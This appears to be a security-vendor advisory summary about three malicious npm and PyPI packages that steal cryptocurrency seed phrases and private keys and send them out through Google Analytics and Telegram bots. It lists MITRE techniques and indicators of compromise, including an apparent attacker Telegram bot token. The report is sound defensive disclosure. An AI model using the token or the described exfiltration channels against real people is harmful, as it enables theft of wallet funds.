Threat Research

The Bad Seeds: Malicious npm and PyPI Packages Pose as Developer Tools to Steal Wallet Credentials

SocketDev
The Bad Seeds: Malicious npm and PyPI Packages Pose as Developer Tools to Steal Wallet Credentials

The Socket Threat Research Team has identified three malicious software packages aiming to exfiltrate cryptocurrency secrets, including mnemonic seed phrases and private keys. Packages found on npm and PyPI disguise themselves as legitimate tools but discreetly collect sensitive data and send it to attackers via Google Analytics and Telegram bots. Developers are warned against sharing their secrets, urging caution against socially engineered prompts. Affected: npm, PyPI, cryptocurrency sector

Keypoints :

  • Three malicious packages were found on npm and PyPI related to cryptocurrency.
  • react-native-scrollpageviewtest extracts mnemonic seed phrases and private keys, utilizing Google Analytics for data exfiltration.
  • web3x harvests mnemonic seed phrases and wallet balances, sending them to a Telegram bot.
  • herewalletbot automates user interactions on Telegram to collect wallet seed phrases.
  • All identified packages remain available at the time of reporting, despite requests for their removal.
  • Developers are advised to never share mnemonic phrases with any software.
  • Malicious packages exploit trust in the open-source ecosystem.
  • Socket’s security tools offer real-time analysis and malware detection for open-source projects.

MITRE Techniques :

  • T1195.002 – Supply Chain Compromise: Compromise Software Supply Chain
  • T1059.006 – Command and Scripting Interpreter: Python
  • T1059.007 – Command & Scripting Interpreter: JavaScript
  • T1566.003 – Phishing: Spearphishing via Service
  • T1608.001 – Stage Capabilities: Upload Malware
  • T1204.002 – User Execution: Malicious File
  • T1552.004 – Unsecured Credentials: Private Keys
  • T1071.001 – Application Layer Protocol: Web Protocols
  • T1041 – Exfiltration Over C2 Channel: Google Analytics

Indicator of Compromise :

  • [Malicious Package] react-native-scrollpageviewtest
  • [Malicious Package] web3x
  • [Malicious Package] herewalletbot
  • [Telegram Bot] @herewalletbot
  • [Telegram Bot Token] 5847347125:AAG-WskaS485OUlGLfa5AKEMW1aKYymplPQ
  • [Email] [email protected]
  • [Email] [email protected]
  • [Email] [email protected]
  • [Defunct Repo] https://github.com/vannszs/HotWalletBot/

Full Story: https://socket.dev/blog/malicious-npm-and-pypi-packages-steal-wallet-credentials

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint